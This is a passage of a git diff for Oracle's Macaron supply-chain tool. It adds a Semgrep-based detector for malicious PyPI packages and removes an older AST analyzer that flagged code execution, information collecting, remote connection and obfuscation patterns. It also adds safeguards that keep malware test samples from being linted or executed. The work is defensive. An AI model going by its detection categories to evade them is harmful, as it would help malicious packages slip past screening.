diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. - repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -65,6 +67,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -82,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -94,6 +98,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. @@ -106,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. 
@@ -197,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. 
diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..4fa6b89d5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -120,12 +121,10 @@ Issues = "https://github.com/oracle/macaron/issues" tests = [] skips = ["B101"] - # https://github.com/psf/black#configuration [tool.black] line-length = 120 - # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ [tool.commitizen] @@ -170,7 +169,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -181,7 +179,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = 
true @@ -209,7 +206,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -261,6 +257,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..fcbd3658b --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,37 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. 
&& pwd)" +SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..2833b32af 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -172,8 +172,8 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, ) sys.exit(status_code) @@ -477,10 +477,13 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." + ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..41df6ca92 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,7 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 + +# absolute path to where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. 
+custom_semgrep_rules = diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..9c083e958 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -52,6 +52,17 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +### Experimental: Source Code Analysis with Semgrep + +The following analyzer has been added as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo heuristic fails or is skipped.
+ +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. + ### Contributing When contributing an analyzer, it must meet the following requirements: @@ -59,6 +70,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). - The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -66,6 +78,40 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. 
- If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). +**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. +- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hyphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcescode_analyzer.py`. +- These tests are written on a per-category basis, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it.
This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() +``` + + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup. These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..8447a9961 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py deleted file mode 100644 index edf7a1830..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ /dev/null @@ -1,491 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Detect suspicious function calls in the code and trace the arguments back to their original values.
- -This allows for deeper analysis of potentially malicious behavior. -""" - -import ast -import base64 -import binascii -import ipaddress -import logging -import os -import pathlib -import re - -import yaml - -from macaron.json_tools import JsonType -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. - - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. 
- """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" - - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False - - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. - - Returns - ------- - dict - The result of the analysis. - """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. 
- # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. - if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. 
- # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. - - Returns - ------- - dict[str, JsonType] | None - The suspicious pattern. - """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: - try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern - - def _extract_imports_from_ast(self, content: str) -> set[str]: - """Extract imports from source code using the parsed AST. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The set of imports. - - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(alias.name) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - imports.add(_module) - for name in node.names: - imports.add(_module + "." + name.name) - - return imports - - def _extract_imports_from_lines(self, content: str) -> set[str]: - """Extract imports from source code using per line pattern matching. - - Parameters - ---------- - source_content: str - The source code as a string. 
- - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. - # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for line in content.splitlines(): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue - - if match.group(1): - # Standard import, handle commas and aliases if present. 
- splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(split) - elif match.group(2): - # From import - imports.add(match.group(2)) - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(match.group(2) + "." + split) - - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. - # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. 
- # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. 
- self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. - """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. 
- - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..02bad65cd --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -0,0 +1,212 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Detect suspicious function calls in the code and trace the arguments back to their original values. + +This allows for deeper analysis of potentially malicious behavior. 
+""" + +import json +import logging +import os +import subprocess # nosec +import tempfile + +from macaron.config.defaults import defaults +from macaron.config.global_config import global_config +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.json_tools import JsonType, json_extract +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. + """ + + def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. 
+ """ + super().__init__( + name="suspicious_patterns_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. + depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], + ) + if resources_path is None: + resources_path = global_config.resources_path + self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) + + def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. + + Semgrep validation is run on the custom rules provided by the user. + + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + + Returns + ------- + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise 